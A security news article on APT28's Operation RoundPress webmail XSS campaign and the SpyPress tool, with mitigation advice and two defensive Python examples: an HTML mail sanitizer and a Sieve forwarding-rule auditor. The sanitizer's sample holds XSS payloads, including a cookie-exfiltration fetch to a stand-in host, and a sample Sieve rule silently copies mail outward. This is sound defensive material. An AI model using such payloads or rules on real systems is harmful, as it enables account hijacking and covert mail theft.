A newly uncovered cyber-espionage campaign, Operation RoundPress, has been linked to the Russian state-sponsored threat actor APT28, also known as Fancy Bear, Sednit, and BlueDelta. The attackers exploited multiple webmail platforms, including a previously unknown vulnerability (CVE-2024-11182) in MDaemon, to infiltrate government and defense organizations across the globe.

Campaign Overview: Operation RoundPress

Discovered by researchers at ESET, Operation RoundPress is an ongoing espionage campaign that began in early 2023. Its goal is to gain unauthorized access to targeted email accounts and exfiltrate confidential communications. The campaign relies on cross-site scripting (XSS) vulnerabilities in webmail software, including one zero-day flaw in MDaemon Webmail; a victim only has to open a crafted message in the vulnerable webmail client for the injected script to run.

APT28 is a well-documented Russian cyber espionage group with ties to Russia’s GRU military intelligence agency. Known for sophisticated attacks on political, defense, and critical infrastructure targets, APT28 has a long history of exploiting software vulnerabilities to steal intelligence.

CVE-2024-11182 – MDaemon Zero-Day

The key vulnerability leveraged in this campaign is CVE-2024-11182, an XSS vulnerability in MDaemon Webmail. It allowed attackers to embed malicious JavaScript in the HTML body of an email. When a user opened that email in a vulnerable webmail client, the script executed in the browser within the user's authenticated webmail session, so it could read mail and change mailbox settings with the user's privileges. No click on a link or attachment was needed; viewing the message was enough.

The vulnerability was assigned a CVSS score of 5.3 (medium). That score undersells its practical impact, because the payload runs inside an authenticated mailbox session. The flaw remained unpatched until November 2024, when MDaemon version 24.5.1 was released to address it.

Other webmail platforms targeted in the campaign included Roundcube, Horde, and Zimbra, all widely deployed open-source webmail solutions, through XSS flaws of their own. In each case the injected script could steal login credentials, read and forward emails, and harvest contact lists; the only user action required was opening the message in the webmail client.
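The mechanism described above (script embedded in an HTML email body, executed when the message is rendered) is what server-side sanitization of message bodies is meant to stop. The following is an added example, not MDaemon's, Roundcube's or any other product's code, and it does not reproduce the CVE-2024-11182 vector, which this page does not describe. It contrasts a deny-list filter that only strips `<script>` with an allowlist sanitizer built on Python's `html.parser`, run over a constructed message body containing generic XSS patterns (an inline script, an `onerror` handler, a `javascript:` link). The tag and attribute allowlists are assumptions chosen for the example.

```python
"""Allowlist HTML sanitizer for webmail message bodies.

Added example, not any webmail product's code. It does not reproduce the
CVE-2024-11182 vector; the payloads in SAMPLE are generic, constructed XSS
patterns used to show why stripping <script> alone is insufficient.
"""
import re
from html import escape
from html.parser import HTMLParser

# Tags a mail client reasonably needs to render a message (assumed list).
ALLOWED_TAGS = {"a", "b", "i", "u", "em", "strong", "p", "br", "div", "span",
                "ul", "ol", "li", "table", "tr", "td", "th", "tbody", "thead",
                "img", "blockquote", "pre", "code", "h1", "h2", "h3"}
# Per-tag attribute allowlist; anything not listed (every on* handler,
# style=, etc.) is dropped. Assumed list.
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
    "td": {"colspan", "rowspan"},
    "th": {"colspan", "rowspan"},
}
# Elements whose entire content is discarded, not just the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math"}
SAFE_URL = re.compile(r"^(https?:|mailto:|cid:)", re.IGNORECASE)
VOID = {"br", "img"}


def naive_strip_script(html: str) -> str:
    """Deny-list baseline: removes <script> blocks only and leaves event
    handlers and javascript: URLs untouched."""
    return re.sub(r"<script\b[^>]*>.*?</script\s*>", "", html,
                  flags=re.IGNORECASE | re.DOTALL)


class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # >0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src"):
                # Remove whitespace/control chars browsers ignore before
                # checking the scheme (e.g. "java\tscript:").
                compact = re.sub(r"[\s\x00-\x1f]", "", value)
                if not SAFE_URL.match(compact):
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # drop comments (conditional-comment tricks)


def sanitize(html: str) -> str:
    p = MailSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


# Constructed sample message body, not a real attacker payload.
SAMPLE = (
    '<p>Hello</p>'
    '<script>fetch("https://example.invalid/?c="+document.cookie)</script>'
    '<img src="x" onerror="alert(1)">'
    '<a href="jAvaScript:alert(2)">report</a>'
    '<a href="https://example.invalid/report">real link</a>'
)

if __name__ == "__main__":
    print("deny-list :", naive_strip_script(SAMPLE))
    print("allowlist :", sanitize(SAMPLE))
```

The deny-list output still carries the `onerror` handler and the `javascript:` link, which is exactly the class of payload that a "strip `<script>`" filter misses; the allowlist version keeps only the tags and attributes it was told about and validates URL schemes after collapsing the whitespace tricks browsers tolerate.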

SpyPress Malware and Data Exfiltration

APT28 employed a custom tool dubbed SpyPress in these attacks. Once the malicious JavaScript was triggered, SpyPress would:

  • Extract the victim’s webmail login credentials
  • Download entire mailboxes, including contacts and attachments
  • Create Sieve rules to automatically forward incoming emails to attacker-controlled addresses

A forwarding rule keeps delivering mail to the attacker even after the user changes their password, because it lives in the mailbox configuration rather than depending on the stolen credentials. That makes the access both stealthy and long-lasting.

According to Matthieu Faou, ESET Senior Malware Researcher:

“The ultimate goal of this operation is to steal confidential data from specific email accounts.”

Global Reach of the Attacks

While the primary focus of the campaign appeared to be government and military organizations in Eastern Europe, ESET also observed targets in Africa, Western Europe, and South America. This wide net underscores the threat’s global implications and the growing reach of Russian cyber operations.

APT28 has previously conducted similar operations, such as exploiting CVE-2023-23397 in Microsoft Outlook and vulnerabilities in Windows Print Spooler. Operation RoundPress continues this trend, with a focus on exploiting communication platforms.

Mitigation Recommendations

Organizations using MDaemon or other webmail platforms should take the following steps immediately:

  • Upgrade MDaemon to version 24.5.1 or later
  • Apply all available patches for Roundcube, Zimbra, and Horde, which the campaign also targeted
  • Harden the webmail interface, keeping in mind that a Web Application Firewall (WAF) in front of the HTTP interface never sees a message body that arrives over SMTP; it must be paired with server-side sanitization of HTML mail
  • Audit mailbox forwarding rules (Sieve scripts and their equivalents) for new or changed redirect targets outside the organization, and alert on suspicious logins
  • Train users to report unexpected messages, noting that this class of attack needs only the message to be viewed in the webmail client
  • Use behavior-based EDR and server-side monitoring to detect post-exploitation anomalies such as bulk mailbox downloads from a single session
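The Sieve forwarding rule described in the SpyPress section is the piece that survives a password change, so auditing mailbox rules is the control that catches it. The following is an added example, not ESET's or any vendor's tooling: a scanner that tokenizes Sieve scripts, finds every `redirect` action (with or without `:copy`), and flags targets whose domain is outside an assumed internal-domain allowlist. The scripts are constructed samples, not rules recovered from SpyPress, and the internal domain list is an assumption. It assumes a Sieve-based server such as Dovecot, where each user's active script can be read from disk; servers that keep rules in a proprietary format need an equivalent check against their own rule store.

```python
"""Flag Sieve redirect rules that forward mail outside the organisation.

Added example, not ESET's or any vendor's tooling. SAMPLES are constructed
scripts, not rules recovered from SpyPress; INTERNAL_DOMAINS is assumed.
"""
import re
from dataclasses import dataclass

# Domains mail may legitimately be forwarded to (assumed for the example).
INTERNAL_DOMAINS = {"example.org", "mail.example.org"}

# Minimal Sieve tokenizer: quoted strings, identifiers and :tags, structural
# characters, and comments (kept as single tokens so they cannot match).
_TOKEN = re.compile(
    r'"(?:\\.|[^"\\])*"'            # quoted string
    r'|:?[A-Za-z_][A-Za-z0-9_]*'    # identifier or :tag
    r'|[{}();\[\],]'                # structural characters
    r'|#[^\n]*'                     # hash comment
    r'|/\*.*?\*/',                  # bracket comment
    re.DOTALL,
)


@dataclass
class Finding:
    script: str
    line: int
    target: str
    copy: bool  # ':copy' keeps the original in the inbox: the silent tee


def _domain(addr: str) -> str:
    """Host part of 'user@host' or 'Name <user@host>', lowercased."""
    m = re.search(r"@([A-Za-z0-9.-]+)>?\s*$", addr.strip())
    return m.group(1).lower() if m else ""


def _unquote(tok: str) -> str:
    return tok[1:-1].replace('\\"', '"').replace("\\\\", "\\")


def scan_sieve(name: str, script: str) -> list:
    """Return a Finding for each redirect target outside INTERNAL_DOMAINS."""
    findings = []
    tokens = [(m.start(), m.group(0)) for m in _TOKEN.finditer(script)]
    i = 0
    while i < len(tokens):
        pos, tok = tokens[i]
        if tok == "redirect":
            copy, targets = False, []
            j = i + 1
            # Collect the action's arguments up to the terminating ';'.
            while j < len(tokens) and tokens[j][1] != ";":
                t = tokens[j][1]
                if t == ":copy":
                    copy = True
                elif t.startswith('"'):
                    targets.append(_unquote(t))
                j += 1
            line = script.count("\n", 0, pos) + 1
            for target in targets:
                if _domain(target) not in INTERNAL_DOMAINS:
                    findings.append(Finding(name, line, target, copy))
            i = j
        i += 1
    return findings


def scan_all(scripts: dict) -> dict:
    return {name: scan_sieve(name, body) for name, body in scripts.items()}


# Constructed sample scripts (not real mailbox rules).
SAMPLES = {
    "alice.sieve": (
        'require ["fileinto"];\n'
        '# move newsletters\n'
        'if header :contains "subject" "newsletter" { fileinto "Lists"; }\n'
    ),
    "bob.sieve": (
        'require ["copy"];\n'
        '# the word redirect in this comment must not trigger\n'
        'if true {\n'
        '  redirect :copy "archive@mail.example.org";\n'
        '  redirect :copy "collector@example.invalid";\n'
        '}\n'
    ),
    "carol.sieve": 'redirect "Carol <carol.ooo@example.org>";\n',
}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        for f in hits:
            kind = "silent copy" if f.copy else "full redirect"
            print(f"{f.script}:{f.line}: {kind} to {f.target}")
```

Run against the real scripts (on Dovecot, the per-user `.sieve` files, or the output of the ManageSieve `GETSCRIPT` command) on a schedule and diff the results; a new external `:copy` redirect on a mailbox that never had one is the signal worth paging on, since it is both the persistence SpyPress uses and something a legitimate user rarely configures.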

APT28’s Persistent Threat

APT28 remains one of the most persistent and technically skilled APT groups in operation today. Its focus on exploiting email infrastructure highlights the need for organizations to keep a close watch on their communication systems. With CVE-2024-11182 now public, other threat actors are likely to adopt similar tactics, making patching and rule monitoring more important than ever.
